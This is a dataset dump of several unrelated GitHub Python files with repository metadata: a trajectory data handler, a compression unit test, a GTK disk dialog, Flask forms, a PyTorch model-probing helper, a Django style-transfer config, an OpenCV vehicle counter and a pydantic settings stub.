= sup.positions_in_local_frame(current_pos, heading, other_poses)\n\n # TODO: it only works for one agent now\n rel_pos = other_poses - current_pos\n rel_vel = other_velocities - current_vel\n distance = np.linalg.norm(rel_pos)\n pedestrian_grid[batch_idx, prev_step, :] = np.concatenate(\n (np.array([np.linalg.norm(rel_pos)]), rel_vel[0]))\n\n # Output values\n for pred_step in range(self.output_sequence_length):\n vx = trajectory.vel_vec[start_idx +1+ pred_step, 0]\n vy = trajectory.vel_vec[start_idx +1+ pred_step, 1]\n px = trajectory.pose_vec[start_idx +1+ pred_step, 0]\n py = trajectory.pose_vec[start_idx +1+ pred_step, 1]\n batch_y[batch_idx, pred_step, 0] = vx\n batch_y[batch_idx, pred_step, 1] = vy\n if self.args.normalize_data:\n self.normalize_vel(batch_y[batch_idx, pred_step,:])\n batch_pos[batch_idx, pred_step, 0] = px\n batch_pos[batch_idx, pred_step, 1] = py\n\n return other_agents_pos\n \n def getTrajectoryAsBatch(self, trajectory_idx, max_sequence_length=1000,unit_testing=False):\n \"\"\"\n Get a trajectory out of the trajectory set in the same format as for the standard training data\n (e.g. for validation purposes).\n \"\"\"\n if unit_testing:\n traj = self.test_trajectory_set[trajectory_idx][1]\n else:\n traj = self.trajectory_set[trajectory_idx][1]\n\n sequence_length = min(max_sequence_length, len(traj) - self.prediction_horizon) - self.prev_horizon\n \n # Old data structures, used for plotting\n batch_x = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_dim]) # data fed for training\n batch_pos = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_state_dim]) # data fed for training\n batch_vel = np.zeros([sequence_length,self.prev_horizon+1, self.args.input_state_dim]) # data fed for training\n batch_goal = np.zeros([sequence_length, 2])\n batch_target = np.zeros([sequence_length, self.prediction_horizon,self.args.output_dim ])\n\n other_agents_info = np.zeros([sequence_length, self.prev_horizon+1, self.args.pedestrian_vector_dim])\n batch_grid = np.zeros((sequence_length, int(self.args.submap_width / self.args.submap_resolution),\n int(self.args.submap_height / self.args.submap_resolution)))\n n_other_agents = traj.other_agents_positions[0].shape[0]\n other_agents_pos = np.zeros((sequence_length, n_other_agents,self.args.pedestrian_vector_state_dim))\n other_agents_vel = np.zeros((sequence_length, self.args.pedestrian_vector_state_dim))\n \n # New data structures, fed to the network\n batch_vel_seq = np.zeros([sequence_length, self.prev_horizon+1, self.args.input_state_dim])\n other_agents_info_seq = np.zeros([sequence_length, self.prev_horizon+1, self.args.pedestrian_vector_dim])\n\n for batch_idx in range(sequence_length):\n other_agents_pos[batch_idx,:,:] = self.fillBatch(id, batch_idx, self.prev_horizon+batch_idx, sequence_length, batch_x, batch_vel, batch_pos,\n batch_grid, other_agents_info, batch_goal, batch_target, traj,\n centered_grid=self.centered_grid)\n\n batch = {\n 'x': batch_x,\n 'vel': batch_vel,\n 'pos': batch_pos,\n 'goal': batch_goal,\n 'grid': batch_grid,\n 'other_agents_info': other_agents_info,\n 'y': batch_target,\n 'other_agents_pos': other_agents_pos,\n 'other_agents_vel': other_agents_vel,\n 'traj': traj,\n 'vel_seq': batch_vel_seq,\n 'other_agents_info_seq': other_agents_info_seq\n }\n return batch\n \n \ndef expand_sequence(sequence_array, horizon): \n # Sequence array has shape [features, time steps]\n # Expanded sequence will have shape [time steps, horizon, features]\n expanded_sequence = np.zeros((sequence_array.shape[1]-horizon+1,\\\n horizon,\\\n sequence_array.shape[0]))\n \n for i in range(sequence_array.shape[0]): # For each feature\n sequence = sequence_array[i, :]\n expanded_sequence[:, :, i] = hankel(sequence[0:horizon],\\\n sequence[horizon-1:]).transpose()\n \n return expanded_sequence\n\n\ndef reduce_sequence(hankel_matrix):\n aux = []\n for feature_idx in range(hankel_matrix.shape[2]):\n aux.append( np.concatenate([hankel_matrix[0, :, feature_idx], hankel_matrix[1:, -1, feature_idx]], axis = 0) )\n return np.stack(aux, axis = 1)\n", "repo_name": "eliatrevisan/IA-MPPI-LBM", "sub_path": "src/data_utils/DataHandler_Keras.py", "file_name": "DataHandler_Keras.py", "file_ext": "py", "file_size_in_byte": 10473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "src.data_utils.Support.positions_in_local_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "src.data_utils.Support", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 192, "usage_type": "call"}, {"api_name": "scipy.linalg.hankel", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 208, "usage_type": "call"}]} +{"seq_id": "12313019075", "text": "import logging\nimport os\nimport random\nimport sys\nimport unittest\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(\n __file__.decode(sys.getfilesystemencoding()))))\nsys.path.insert(0, ROOT_DIR)\n\nfrom utils import large\n\n\nclass LargeTest(unittest.TestCase):\n def test_1m_1(self):\n array = range(1000000)\n data = large.pack(array)\n self.assertGreater(1000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_1m_1000(self):\n array = [i*1000 for i in xrange(1000000)]\n data = large.pack(array)\n self.assertGreater(2000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_1m_pseudo(self):\n # Compresses a pseudo-random suite. Still compresses very well.\n random.seed(0)\n array = sorted(random.randint(0, 1000000) for _ in xrange(1000000))\n data = large.pack(array)\n self.assertGreater(302000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_empty(self):\n self.assertEqual('', large.pack([]))\n self.assertEqual([], large.unpack(''))\n\n\nif __name__ == '__main__':\n VERBOSE = '-v' in sys.argv\n logging.basicConfig(level=logging.DEBUG if VERBOSE else logging.ERROR)\n unittest.main()\n", "repo_name": "kiwibrowser/src", "sub_path": "tools/swarming_client/tests/large_test.py", "file_name": "large_test.py", "file_ext": "py", "file_size_in_byte": 1193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.getfilesystemencoding", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.large.pack", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 17, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.large.pack", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 25, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "utils.large.pack", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.large.pack", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 36, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 42, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "19095813728", "text": "import glib\nfrom gi.repository import Gtk\nimport operator\n\nclass SelectedDisksDialog(object):\n COL_OBJECT = 0\n COL_NAME = 1\n COL_CAPACITY = 2\n COL_FREE = 3\n COL_ID = 4\n SUMMARY_TEMPLATE=\"<b>%(count)d disks; %(capacity).1f GB capacity; \" \\\n \"%(free).1f GB free space</b> (unpartitioned & filesystems)\"\n\n def __init__(self):\n builder = Gtk.Builder()\n builder.add_from_file(\"selected_disks.glade\")\n builder.connect_signals(self)\n self.window = builder.get_object(\"selected_disks_dialog\")\n self.view = builder.get_object(\"treeview_disks\")\n self.store = builder.get_object(\"treestore_disks\")\n self.label = builder.get_object(\"label_summary\")\n self.store.set_sort_func(self.COL_CAPACITY, self._cmp_device, \"size\")\n self.store.set_sort_func(self.COL_FREE, self._cmp_device, \"size\")\n\n def _append_device(self, device, it_parent):\n it = self.store.append(it_parent)\n self.store.set_value(it, self.COL_OBJECT, device)\n self.store.set_value(it, self.COL_NAME, device.model)\n self.store.set_value(it, self.COL_CAPACITY, \"%d GB\" % (device.size / 1000))\n self.store.set_value(it, self.COL_FREE, \"%d GB\" % (device.size / 1000))\n self.store.set_value(it, self.COL_ID, device.serial)\n\n def _cmp_device(self, model, a_iter, b_iter, attr):\n def compute_for_iter(it):\n device = self.store.get_value(it, self.COL_OBJECT)\n if device:\n return getattr(device, attr)\n # if this is a category, compute the sum of attr over the children\n acc = 0\n it_children = self.store.iter_children(it)\n while it_children:\n acc += compute_for_iter(it_children)\n it_children = self.store.iter_next(it_children)\n return acc\n\n return compute_for_iter(a_iter) - compute_for_iter(b_iter)\n\n def _update_label(self):\n vals = {\n \"count\" : len(list(self.iter_device_rows())),\n \"capacity\" : reduce(lambda acc, row: acc + row[self.COL_OBJECT].size,\n self.iter_device_rows(), 0) / 1000,\n \"free\" : reduce(lambda acc, row: acc + row[self.COL_OBJECT].size,\n self.iter_device_rows(), 0) / 1000\n }\n self.label.set_markup(self.SUMMARY_TEMPLATE % vals)\n\n def cb_close(self, button):\n self.window.destroy()\n\n def cb_remove(self, button):\n path = self.view.get_cursor()[0]\n it = self.store.get_iter(path)\n self.store.remove(it)\n self.update()\n\n def iter_device_rows(self):\n \"\"\" Iterator for those rows of model that represent a real device. \"\"\"\n return (it for it in self.store)\n\n def populate(self, devices):\n map(lambda d : self._append_device(d, None), devices)\n self.update()\n self.view.set_show_expanders(False)\n\n def run(self):\n self.window.show_all()\n self.window.run()\n self.window.destroy()\n return [r[self.COL_OBJECT] for r in self.iter_device_rows()]\n\n def update(self):\n self._update_label()\n\nclass SelectedDisksTreeDialog(SelectedDisksDialog):\n def iter_device_rows(self):\n \"\"\" Iterator for those rows of model that represent a real device.\n\n Categories, namely, are excluded.\n \"\"\"\n for category in self.store:\n for it in category.iterchildren():\n yield it\n\n def _update_categories(self):\n \"\"\" Delete categories with no child. \"\"\"\n categories = 0\n it = self.store.get_iter_first()\n while it:\n if self.store.iter_has_child(it):\n categories += 1\n it = self.store.iter_next(it)\n else:\n if not self.store.remove(it):\n break\n\n def populate(self, devices):\n types = {d.type : None for d in devices}\n for t in types:\n types[t] = self.store.append(None)\n self.store.set_value(types[t], self.COL_NAME, t)\n map(lambda d: self._append_device(d, types[d.type]), devices)\n self.update()\n self.view.expand_all()\n\n def update(self):\n self._update_categories()\n self._update_label()\n", "repo_name": "akozumpl/selected_disks", "sub_path": "selected_disks_dialog.py", "file_name": "selected_disks_dialog.py", "file_ext": "py", "file_size_in_byte": 4299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gi.repository.Gtk.Builder", "line_number": 15, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "30406776745", "text": "from flask_wtf import FlaskForm\r\nfrom wtforms import SubmitField, StringField, FloatField, SelectMultipleField, SelectField\r\nfrom wtforms.validators import InputRequired, Length\r\n\r\nimport Project_define as pk_db\r\n\r\nfrom sqlalchemy.orm import sessionmaker\r\nSession = sessionmaker(bind = pk_db.engine)\r\nsession = Session()\r\n\r\ncompany_list = session.query(pk_db.Company).all()\r\ncompany_choices = []\r\nfor item in company_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n company_choices.append(my_tuple)\r\n\r\nproduct_list = session.query(pk_db.Product).all()\r\nproduct_choices = []\r\nfor item in product_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n product_choices.append(my_tuple)\r\n\r\ncustomer_list = session.query(pk_db.Customer).all()\r\ncustomer_choices = []\r\nfor item in customer_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n customer_choices.append(my_tuple)\r\n\r\nclass Sold_To(FlaskForm):\r\n customer_id = SelectField(\"Customer\", choices = customer_choices)\r\n product_id = SelectMultipleField(\"Product\", choices = product_choices)\r\n submit = SubmitField(\"Add sell\")\r\n\r\nclass Delete_Customer(FlaskForm):\r\n customer_id = SelectField(\"Customer \", choices = customer_choices) \r\n submit = SubmitField(\"Delete Customer\")\r\n", "repo_name": "PavloKuK/Companies-and-Customers", "sub_path": "Project_forms.py", "file_name": "Project_forms.py", "file_ext": "py", "file_size_in_byte": 1461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 8, "usage_type": "call"}, {"api_name": "Project_define.engine", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Project_define.Company", "line_number": 11, "usage_type": "attribute"}, {"api_name": "Project_define.Product", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Project_define.Customer", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.SelectMultipleField", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 43, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 44, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "19827577119", "text": "\"\"\"Gather information about pretrained model by forwarding sample batches.\"\"\"\nimport typing as t\nimport contextlib\nimport warnings\nimport functools\n\nimport torch\n\nfrom ..adapters import base as adapters_base\n\n\n__all__ = [\n \"run_inspection_batches\",\n]\n\n\nTensorType = t.Union[torch.Tensor, tuple[torch.Tensor, ...], dict[str, t.Any]]\n\n\nclass _AnalyzerContainer:\n \"\"\"Container for information gathered while exploring pretrained model.\"\"\"\n\n def __init__(self) -> None:\n self.unnecessary_cand: list[tuple[str, torch.nn.Module]] = []\n self.probing_input_dims: dict[str, tuple[int, ...]] = {}\n\n # Note: it is necessary to keep a collection of 'modules that can not be ignored' since\n # modules are reused.\n self.cant_be_ignored: set[tuple[str, torch.nn.Module]] = set()\n\n def dismiss_unnecessary_cand(self) -> \"_AnalyzerContainer\":\n \"\"\"Clear current unnecessary module candidates, and mark then as `can't be ignored`.\"\"\"\n self.cant_be_ignored.update(self.unnecessary_cand)\n self.unnecessary_cand.clear()\n return self\n\n def register_output_shape(self, module_name: str, m_output: TensorType) -> \"_AnalyzerContainer\":\n \"\"\"Register output shape for the given module.\"\"\"\n if torch.is_tensor(m_output):\n m_output = (m_output,) # type: ignore\n\n out_shapes: tuple[int, ...] = tuple(\n item.shape[-1] for item in m_output if hasattr(item, \"shape\") # type: ignore\n )\n\n if not out_shapes:\n info_types = tuple(map(type, m_output))\n info_keys = (\n f\" and keys {tuple(m_output.keys())}\" # type: ignore\n if issubclass(type(m_output), dict)\n else \"\"\n )\n\n raise TypeError(\n f\"Could not infer output shape from probed module '{module_name}' (with outputs \"\n f\"of type {info_types}{info_keys}). If type seems correct, you can \"\n \"provide the probing input dimensions as:\\n\\n curiosidade.attach_probers(..., \"\n f\"modules_input_dim={{'{module_name}': INPUT_DIM)}}.\\n\"\n \"In case the output types are incorrect, please make sure you are probing the \"\n \"correct module.\"\n )\n\n self.probing_input_dims[module_name] = out_shapes\n\n return self\n\n\n@contextlib.contextmanager\ndef analyze_modules(\n base_model: adapters_base.BaseAdapter,\n probed_modules: t.Set[str],\n known_output_dims: t.FrozenSet[str],\n) -> t.Iterator[_AnalyzerContainer]:\n \"\"\"Insert temporary hooks in pretrained model to collect information.\"\"\"\n pre_hooks: list[torch.utils.hooks.RemovableHandle] = []\n post_hooks: list[torch.utils.hooks.RemovableHandle] = []\n\n channel_container = _AnalyzerContainer()\n channel_container.cant_be_ignored.add((\"\", base_model.get_torch_module()))\n\n def hook_pre_fn(\n module: torch.nn.Module, *args: t.Any, module_name: str, **kwargs: t.Any\n ) -> None:\n # pylint: disable='unused-argument'\n # A module started its forward (may be probed or not)\n # Should it be ignored?\n # - If it is a probed module, it will eventually ends and clear everything, so no\n # need to worry anyway.\n # - If it is not a probed module:\n # - If it is within a probed module, it will end and clear this module. Ok.\n # - If it is not within a probled module, good candidate to prune. Ok.\n # Ok.\n channel_container.unnecessary_cand.append((module_name, module))\n\n def hook_post_fn(\n module: torch.nn.Module,\n m_input: TensorType,\n m_output: TensorType,\n module_name: str,\n **kwargs: t.Any,\n ) -> None:\n # pylint: disable='unused-argument'\n # Probed module ended now, therefore nothing can be ignored up to this point.\n channel_container.dismiss_unnecessary_cand()\n\n if module_name not in known_output_dims:\n channel_container.register_output_shape(module_name, m_output)\n\n elif issubclass(type(m_output), dict):\n info_keys = tuple(m_output.keys()) # type: ignore\n warnings.warn(\n f\"Module '{module}' output is a dictionary with keys {info_keys}. \"\n \"Every dictionary item is going to be an input argument for your probing model's \"\n \"forward method. Please take this into consideration while specifying its \"\n \"method signature.\",\n RuntimeWarning,\n )\n\n for module_name, module in base_model.named_modules():\n fn_module = functools.partial(hook_pre_fn, module_name=module_name)\n pre_hooks.append(module.register_forward_pre_hook(fn_module))\n\n if module_name in probed_modules:\n fn_module = functools.partial(hook_post_fn, module_name=module_name)\n post_hooks.append(module.register_forward_hook(fn_module))\n\n try:\n yield channel_container\n\n finally:\n while pre_hooks:\n pre_hooks.pop().remove()\n\n while post_hooks:\n post_hooks.pop().remove()\n\n\ndef run_inspection_batches(\n sample_batches: t.Sequence[t.Any],\n base_model: adapters_base.BaseAdapter,\n probed_modules: t.Collection[str],\n known_output_dims: t.Optional[t.Collection[str]] = None,\n) -> dict[str, t.Any]:\n \"\"\"Gather information about pretrained model by forwaring sample batches.\n\n Function used to infer probing input dimensions, and also detect pretrained modules\n unnecessary to train probing models.\n\n Parameters\n ----------\n sample_batches : t.Sequence[t.Any]\n Sample batches to forward to the pretrained model. Only a single batch should suffice, but\n additional batches may be used to detect any form of non-deterministic behaviour in the\n forward phase of the pretrained model. If this is the case, pretrained modules will be\n deemed unnecessary to train probing models, at the expense of extra computational cost.\n\n base_model : adapters.base.BaseAdapter\n Properly adapted (or even extended) pretrained model to probe.\n\n probed_modules : t.Collection[str]\n Names of all modules that will be probed.\n\n known_output_dims : t.Collection[str] or None, default=None\n Known output dimensions of probed layers. Used to avoid throwing exceptions when an\n output dimension has not been successfully inferred.\n\n Returns\n -------\n inspection_results : dict[str, t.Any]\n Dictionary containing information about pretrained model architecture, containing the\n following keys:\n\n - `probing_input_dims`: dictionary mapping probed modules to its input dimensions (tuples).\n - `unnecessary_modules`: tuple containing all modules deemed unnecessary for probing model\n training, following the (module_name, module_reference) pair format.\n \"\"\"\n base_model.eval()\n\n known_output_dims = known_output_dims or frozenset()\n known_output_dims = frozenset(known_output_dims)\n\n unnecessary_modules: tuple[tuple[str, torch.nn.Module], ...] = tuple()\n probing_input_dims: dict[str, tuple[int, ...]] = {}\n\n probed_set = set(probed_modules)\n\n if torch.is_tensor(sample_batches):\n sample_batches = [sample_batches]\n\n with torch.no_grad(), analyze_modules(\n base_model, probed_set, known_output_dims\n ) as channel_container:\n for sample_batch in sample_batches:\n input_feats, _ = base_model.break_batch(sample_batch)\n base_model(input_feats)\n temp = tuple(\n item\n for item in channel_container.unnecessary_cand\n if item and item not in channel_container.cant_be_ignored\n )\n\n non_deterministic_behaviour_flag = unnecessary_modules and temp != unnecessary_modules\n\n if non_deterministic_behaviour_flag:\n warnings.warn(\n message=(\n \"Non-deterministic behaviour detected while inferring unnecessary modules \"\n \"for prober training. Will not prune any module, and the full model will \"\n \"be loaded in the chosen device.\"\n ),\n category=UserWarning,\n )\n unnecessary_modules = tuple()\n break\n\n unnecessary_modules = temp\n probing_input_dims = channel_container.probing_input_dims\n\n out = {\n \"probing_input_dims\": probing_input_dims,\n \"unnecessary_modules\": unnecessary_modules,\n }\n\n return out\n", "repo_name": "ulysses-camara/ulysses-curiosity", "sub_path": "curiosidade/helpers/flow_analyzer.py", "file_name": "flow_analyzer.py", "file_ext": "py", "file_size_in_byte": 8649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Union", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "adapters.base.BaseAdapter", "line_number": 70, "usage_type": "attribute"}, {"api_name": "adapters.base", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 71, "usage_type": "attribute"}, {"api_name": "typing.FrozenSet", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 96, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 111, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 120, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 124, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 68, "usage_type": "attribute"}, {"api_name": "typing.Iterator", "line_number": 73, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "attribute"}, {"api_name": "adapters.base.BaseAdapter", "line_number": 140, "usage_type": "attribute"}, {"api_name": "adapters.base", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Collection", "line_number": 141, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 142, "usage_type": "attribute"}, {"api_name": "typing.Collection", "line_number": 142, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 182, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 190, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "attribute"}]} +{"seq_id": "21489657998", "text": "import os\nfrom pathlib import Path\nfrom django.apps import AppConfig\nfrom .fast_style import load_model\nfrom typing import Optional, Any\n\n\ndef scan_models(dir):\n models = {}\n for root, sunfolders, files in os.walk(dir):\n for file in files:\n if models.get(Path(root).name):\n if file.endswith(\".pth\"):\n models[Path(root).name].append(str(Path(root)/file))\n else:\n if file.endswith(\".pth\"):\n models[Path(root).name] = [str(Path(root)/file)]\n return models\n\n\nclass StyleTransferConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'style_transfer'\n model_paths = scan_models('models/')\n models = {}\n for type, paths_list in model_paths.items():\n if type != \"experimental\":\n for path in paths_list:\n models[path] = load_model(path)\n", "repo_name": "AyushExel/starrynight", "sub_path": "backend/style_transfer/apps.py", "file_name": "apps.py", "file_ext": "py", "file_size_in_byte": 909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.apps.AppConfig", "line_number": 21, "usage_type": "name"}, {"api_name": "fast_style.load_model", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "8136054328", "text": "import cv2\r\nimport glob\r\nfrom vehicle_detector import VehicleDetector\r\n\r\ndef count(img_add):\r\n # Load Veichle Detector\r\n vd = VehicleDetector()\r\n\r\n # Load images from a folder\r\n img=cv2.imread(img_add)\r\n\r\n # Loop through all the images\r\n vehicle_boxes = vd.detect_vehicles(img)\r\n vehicle_count = len(vehicle_boxes)\r\n time=15\r\n if(vehicle_count<=20):\r\n time+=int(1.3*vehicle_count)-10\r\n else :\r\n if(vehicle_count>20 and vehicle_count<35):\r\n time+=int(vehicle_count*1.43)-10\r\n else:\r\n time=150\r\n\r\n for box in vehicle_boxes:\r\n x, y, w, h = box\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (25, 0, 180), 3)\r\n\r\n cv2.putText(img, \"Vehicles: \" + str(vehicle_count), (20, 50), 0, 2, (100, 200, 0), 3)\r\n cv2.putText(img, \"Timer: \" + str(time),(20,110),0,2,(255,255,255),3)\r\n cv2.imwrite(img_add,img)\r\n cv2.destroyAllWindows()\r\n #cv2.imshow(\"Cars\", img)\r\n #cv2.waitKey(0)\r\n", "repo_name": "aftabahmed-09/ATST", "sub_path": "flaskk/vehicle_counting.py", "file_name": "vehicle_counting.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "vehicle_detector.VehicleDetector", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "27226088464", "text": "from enum import Enum\nfrom pydantic import BaseSettings, Field\n\nfrom shared.config.cors import CORSSettings\n\n\nclass ApplicationEnvironment(str, Enum):\n LOCAL = \"local\"\n DEV = \"dev\"\n PROD = \"prod\"\n TEST = \"test\"\n\n\nclass ApplicationSettings(BaseSettings):\n env: ApplicationEnvironment = Field(default=ApplicationEnvironment.LOCAL, env=\"APP_ENV\")\n cors: CORSSettings = CORSSettings()\n", "repo_name": "NEONKID/cookiecutter-nk-fastapi", "sub_path": "{{cookiecutter.project_slug}}/shared/config/__init__.py", "file_name": "__init__.py", "file_ext": "py", 